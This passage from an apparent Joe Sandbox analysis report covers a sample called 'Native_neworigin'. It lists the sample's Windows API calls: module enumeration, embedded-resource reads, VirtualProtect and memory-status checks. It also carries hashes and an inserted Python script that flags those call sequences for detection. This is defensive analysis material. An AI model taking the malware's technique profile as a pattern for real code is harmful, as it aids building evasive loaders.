77->79 80 401d86-401d88 77->80 84 401da5-401da7 79->84 82 401d8a-401d90 80->82 83 401d9c-401d9e 80->83 82->79 86 401d92-401d9a 82->86 83->84 84->25 87 401dad-401dbd Module32Next 84->87 89 4021c6-4021ca 85->89 90 40246a-402470 85->90 86->77 86->83 87->7 87->55 89->90 91 4021d0-402217 call 4018f0 89->91 92 402472-402475 90->92 93 40247a-402480 90->93 98 40221d-40223d 91->98 99 40244f-40245f 91->99 92->93 93->5 95 402482-402487 93->95 95->5 98->99 103 402243-402251 98->103 99->90 100 402461-402467 call 40b6b5 99->100 100->90 103->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 103->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-40234d call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 152 40234e call 2b7d006 122->152 153 40234e call 2b7d01d 122->153 123->122 127 402350-402352 128 402354-402355 SafeArrayDestroy 127->128 129 40235b-402361 127->129 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 132 402377-402379 131->132 133 40237b 131->133 135 40237d-40238f call 4018d0 132->135 133->135 154 402390 call 2b7d006 135->154 155 402390 call 2b7d01d 135->155 138 402392-4023a2 SafeArrayCreateVector 139 4023a4-4023a9 call 40ad90 138->139 140 4023ae-4023b4 138->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99 152->127 153->127 154->138 155->138
APIs
• OleInitialize.OLE32(00000000), ref: 004019FD
• _getenv.LIBCMT ref: 00401ABA
• GetCurrentProcessId.KERNEL32 ref: 00401ACD
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
• Module32First.KERNEL32 ref: 00401C48
• CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
• Module32Next.KERNEL32(00000000,?), ref: 00401D02
• Module32Next.KERNEL32(00000000,?), ref: 00401DB6
• CloseHandle.KERNEL32(00000000), ref: 00401DC4
• GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
• FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
• LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
• LockResource.KERNEL32(00000000), ref: 00401EA7
• SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
• _malloc.LIBCMT ref: 00401EBA
                                                                                                                                                                                                                                                                                                                                  • _memset.LIBCMT ref: 00401EDD
                                                                                                                                                                                                                                                                                                                                  • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396561892.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396630294.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396656156.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.000000000044C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396798482.000000000055F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                                                                                                                                                                                                                                  • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1430744539-2962942730
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
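The API list of this function is the record an analyst works from. As an added example that is not part of the Joe Sandbox report, the Python script below parses bullet lines in that format and checks them, in order, for the two call sequences this function exhibits: a Toolhelp32 module enumeration (snapshot flag 0x8, which is TH32CS_SNAPMODULE) and the FindResource, LoadResource, LockResource, SizeofResource chain by which a binary reads a blob out of its own resource section. The sample text is copied from the list above, the pattern labels and the subsequence-matching logic are my own assumptions, and the TH32CS_* values are the documented Windows constants.

```python
import re
from collections import namedtuple

# Constructed sample input: the "APIs" bullet list of the function at 0x00401AD6..0x00401F02
# in process 9, copied from the report block above. Nothing here is fetched from the sandbox.
SAMPLE_APIS = """\
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
• Module32First.KERNEL32 ref: 00401C48
• CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
• Module32Next.KERNEL32(00000000,?), ref: 00401D02
• Module32Next.KERNEL32(00000000,?), ref: 00401DB6
• CloseHandle.KERNEL32(00000000), ref: 00401DC4
• GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
• FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
• LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
• LockResource.KERNEL32(00000000), ref: 00401EA7
• SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
• _malloc.LIBCMT ref: 00401EBA
• _memset.LIBCMT ref: 00401EDD
• SizeofResource.KERNEL32(00000000,?), ref: 00401F02
"""

ApiRef = namedtuple("ApiRef", "name module args ref")

# One bullet line: "Name.MODULE(arg,arg), ref: ADDR", or "Name.MODULE ref: ADDR" when the
# plugin recorded no arguments. Arguments are kept as the hex or "?" strings the report prints.
LINE_RE = re.compile(
    r"^\s*(?:•|\*|-)?\s*(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

def parse_api_refs(text):
    """Parse report 'APIs' lines into ApiRef tuples (ref as int); non-matching lines are skipped."""
    refs = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] is not None else ()
        refs.append(ApiRef(m["name"], m["module"], args, int(m["ref"], 16)))
    return refs

# Call sequences worth flagging, in the order they must appear; unrelated calls may sit between
# them. The labels are my own (assumption); the API names are the ones the report lists.
PATTERNS = {
    "module_enumeration_toolhelp": ("CreateToolhelp32Snapshot", "Module32First", "Module32Next"),
    "embedded_resource_read": ("FindResourceA", "LoadResource", "LockResource", "SizeofResource"),
}

def match_pattern(refs, pattern):
    """Return the ApiRefs that satisfy `pattern` as an ordered subsequence of `refs`, or None."""
    matched, i = [], 0
    for r in refs:
        if i < len(pattern) and r.name == pattern[i]:
            matched.append(r)
            i += 1
    return matched if i == len(pattern) else None

def classify(refs):
    """Map each fully present pattern label to the call-site addresses that matched it."""
    hits = {}
    for label, pattern in PATTERNS.items():
        m = match_pattern(refs, pattern)
        if m:
            hits[label] = [r.ref for r in m]
    return hits

# Documented TH32CS_* flag bits of CreateToolhelp32Snapshot's dwFlags argument.
TH32CS_FLAGS = {
    0x1: "TH32CS_SNAPHEAPLIST", 0x2: "TH32CS_SNAPPROCESS", 0x4: "TH32CS_SNAPTHREAD",
    0x8: "TH32CS_SNAPMODULE", 0x10: "TH32CS_SNAPMODULE32",
}

def decode_snapshot_flags(refs):
    """For each CreateToolhelp32Snapshot call with a concrete first argument, name the flag bits set."""
    out = []
    for r in refs:
        if r.name == "CreateToolhelp32Snapshot" and r.args and r.args[0] != "?":
            flags = int(r.args[0], 16)
            out.append((r.ref, [n for bit, n in TH32CS_FLAGS.items() if flags & bit]))
    return out

if __name__ == "__main__":
    refs = parse_api_refs(SAMPLE_APIS)
    for label, sites in classify(refs).items():
        print(f"{label}: " + ", ".join(f"{s:08X}" for s in sites))
    for site, names in decode_snapshot_flags(refs):
        print(f"CreateToolhelp32Snapshot @ {site:08X}: dwFlags = {'|'.join(names)}")
```

Order matters: the matcher requires the calls as an in-order subsequence, so a function that merely imports these APIs, or that calls LoadResource before FindResourceA, is not flagged. Arguments the plugin could not resolve are printed as "?" and are kept as strings; the flag decoder skips them rather than guessing.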
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_820000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 70d9cefdcd715ae7bbda575b6d006794ceb7c406be710e38ac075b597b19c28b
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 44ee2631e5ff40fa53d5c19d0fcb596929eb572e066e35de90909b6710dbdf1f
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 70d9cefdcd715ae7bbda575b6d006794ceb7c406be710e38ac075b597b19c28b
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FFF1172191D74CDECB364B684C0973D3BA0FB72B34F4D0696E561D61E2EF688C089627
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2414233121.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_5a20000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6f4fd0f1439c465497320e51578000e10dc4f8713eff4bce9bc1b092385057de
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: eaec65ad90886468ca61f625d3cede2612502f3df489fd0a2f804b9a24c2dae6
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f4fd0f1439c465497320e51578000e10dc4f8713eff4bce9bc1b092385057de
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C363FB31D10B1A8ADB11EF68C854AA9F7B1FF99300F11C79AE45877121EB70AAD5CF81
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2414233121.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_5a20000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 05b1f5d12c06e12b73215ed90e0558d196bbcf2f8ed2fac51f7fdeeb816b37e2
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3d7fd202f4193e510d1a4aaf8ae5e9fa68e7d6adba44b0a46077ac4424bf3635
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05b1f5d12c06e12b73215ed90e0558d196bbcf2f8ed2fac51f7fdeeb816b37e2
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9331F31D107198ECB11EF68C894AADF7B1FF99300F15C79AE459A7211EB70AAC5CB81
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2414233121.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_5a20000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c000a3c2461e9e5ff3e5c16150a6429e8a459f13b699af849664cba5e88922ba
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8ee9bdf370e86ae927a6670e1c37baa0d3cef51172a81aac1b92dea30f15acef
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c000a3c2461e9e5ff3e5c16150a6429e8a459f13b699af849664cba5e88922ba
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08B15D70E042199FDF14CFADD986BADBBF2BF88314F148129D815E7294EB749842CB81
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2414233121.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_5a20000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
Memory Dump Source
• Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_820000_Native_neworigin.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph (executed vs. not-executed blocks; graph data not reproduced)
APIs
• _malloc.LIBCMT ref: 0040AF80
  • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
  • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
  • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
• std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
  • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
• std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
• __CxxThrowException@8.LIBCMT ref: 0040AFC5
Memory Dump Source
• Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000002.2396561892.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000009.00000002.2396630294.000000000041B000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000009.00000002.2396656156.0000000000422000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000009.00000002.2396683576.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 00000009.00000002.2396683576.000000000044C000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 00000009.00000002.2396798482.000000000055F000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
Similarity
• API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
• String ID:
• API String ID: 1411284514-0

Control-flow Graph (executed vs. not-executed blocks; graph data not reproduced)
APIs
Memory Dump Source
• Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_820000_Native_neworigin.jbxd
Similarity
• API ID: ComputerName
• String ID:
• API String ID: 3545744682-0

Control-flow Graph (executed vs. not-executed blocks; graph data not reproduced)
APIs
• CreateThread.KERNEL32(00000000,00000000,008255C0,?,00000000,00000000), ref: 00825A51
• RtlExitUserThread.NTDLL(00000000), ref: 00825B11
Memory Dump Source
• Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_820000_Native_neworigin.jbxd
Similarity
• API ID: Thread$CreateExitUser
• String ID:
• API String ID: 4108186749-0

Control-flow Graph
[Graph rendered as an image in the original report; the node/edge dump is omitted here. Basic blocks span 0x6920040-0x69205e5 inside the 0x6920000 dump; no calls to other functions are recorded in the graph.]
Strings
Memory Dump Source
• Source File: 00000009.00000002.2431348520.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_6920000_Native_neworigin.jbxd
Similarity
• API ID:
• String ID: Te]q$Te]q
• API String ID: 0-3320153681
• Opcode ID: 49d57abe7c0b67cb0a962915fb54ac15071abc3b39fb8c82f55ed27bc8081db1
• Instruction ID: 7ffb23f5f176c64effba11db7ed3257910e7b7964c233471f6fd4d1c7367edc9
• Opcode Fuzzy Hash: 49d57abe7c0b67cb0a962915fb54ac15071abc3b39fb8c82f55ed27bc8081db1
• Instruction Fuzzy Hash: 82F16A30E002198FDB64DB68C490BADB7B6FF89300F60856AD409EB795DB75DC46CB91

Control-flow Graph
[Graph rendered as an image in the original report; the node/edge dump is omitted here. Basic blocks span 0x69219f0-0x6921caa inside the 0x6920000 dump; the graph records calls to 0x69218a8, 0x692171c and 0x6921734, and an indirect call site at 0x6921ad3 resolved to 0x6921c50, 0x6921be0 and 0x69219f0 (the function itself).]
Strings
Memory Dump Source
• Source File: 00000009.00000002.2431348520.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_6920000_Native_neworigin.jbxd
Similarity
• API ID:
• String ID: (&]q$(aq
• API String ID: 0-1602648543
• Opcode ID: 2e85d3ca6d3f73e0d1abf97a53fa982539c4ab48ea2ee0d2e65e3ac196310cf3
• Instruction ID: dce580f5707814c7e1568a0d4f0a31b8891b2a481203fb726dbc6945033dc874
• Opcode Fuzzy Hash: 2e85d3ca6d3f73e0d1abf97a53fa982539c4ab48ea2ee0d2e65e3ac196310cf3
• Instruction Fuzzy Hash: 73719131F002199FDB55DFA9C8906EEBBF6AF88700F14856AE505A7384DF30AD02CB91

Control-flow Graph
[Graph rendered as an image in the original report; the node/edge dump is omitted here. Basic blocks span 0x6921138-0x6921439 inside the 0x6920000 dump; no calls to other functions are recorded in the graph.]
Strings
Memory Dump Source
• Source File: 00000009.00000002.2431348520.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_6920000_Native_neworigin.jbxd
Similarity
• API ID:
• String ID: PH]q$U
• API String ID: 0-1399991065
• Opcode ID: ef6311effb2b9201c59aaf9d7caa3d4cb1f8b3aed2ca569fa155167820982be5
• Instruction ID: f0fabf00e38c37138bf2326e09d835734591dd8e3806edb3d776117dc4f4e78c
• Opcode Fuzzy Hash: ef6311effb2b9201c59aaf9d7caa3d4cb1f8b3aed2ca569fa155167820982be5
• Instruction Fuzzy Hash: FF512631F001668BDB599AB894503AE7AEBEFC5750F244869D20ADB798DE30CC52C7D1

APIs
• VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00825D6D
Memory Dump Source
• Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_820000_Native_neworigin.jbxd
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
• Opcode ID: 35c061941818d34a2dede8a56622738affb7a9f989e6e84a6a569f5a0774aeab
• Instruction ID: 5206d09cef25c4e7e08d54f649ebbd411811fb9edb3d01c1fd98ffbbd0bbea3c
• Opcode Fuzzy Hash: 35c061941818d34a2dede8a56622738affb7a9f989e6e84a6a569f5a0774aeab
• Instruction Fuzzy Hash: A4F09055AC4F30BBEA3E0364F94DB702A60FB22728F0D5075F245E90B286766CC5C902

APIs
• GlobalMemoryStatusEx.KERNEL32 ref: 059AFF17
Memory Dump Source
• Source File: 00000009.00000002.2414188038.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_59a0000_Native_neworigin.jbxd
Similarity
• API ID: GlobalMemoryStatus
• String ID:
• API String ID: 1890195054-0
• Opcode ID: 0ffaa13602fa37cd23e6331e93b54dbaf55d6f36e1fad8750b27023accb2f263
• Instruction ID: 2c408746ac8c27612b5c1f97dae2c8e1257900f9e6cf18c78bc30920de8f8a30
• Opcode Fuzzy Hash: 0ffaa13602fa37cd23e6331e93b54dbaf55d6f36e1fad8750b27023accb2f263
• Instruction Fuzzy Hash: 2D2142B2C052999FCB10CFAAD444A9EFBB4EF49310F10816AE418A7250D738A944CFE5
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,?,?), ref: 02CC91A4
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2398097932.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_2cc0000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c542a06071af78301412ef5bf519a2d03f22f368f5f81335599b5e5eaa76c4c1
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 685f779c447c271958a12483e5ce66e7c7c050d3f84e6064bb97b98454039cef
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c542a06071af78301412ef5bf519a2d03f22f368f5f81335599b5e5eaa76c4c1
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B11F7B1D002099FDB10DFAAC945AAFFBF5FF49314F108419D419A7250C779A945CFA1
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 059AFF17
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2414188038.00000000059A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059A0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_59a0000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: GlobalMemoryStatus
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1890195054-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 32ffde4a5039cfdd755a1042ea894b1fcedc74d1b151311f88d161724a966029
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 34534c713028bc2e9f26e5d77ac82a7f6aedc9db7aa981fd800a14bd3da01847
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32ffde4a5039cfdd755a1042ea894b1fcedc74d1b151311f88d161724a966029
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D61112B1C006599BCB10CF9AC544A9EFBF4EF49320F10812AD818A7240D378A940CFE5
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                                                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32 ref: 00401898
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396561892.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396630294.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396656156.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.000000000044C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396798482.000000000055F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AllocString_malloc
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 959018026-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396561892.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396630294.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396656156.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.000000000044C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396798482.000000000055F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
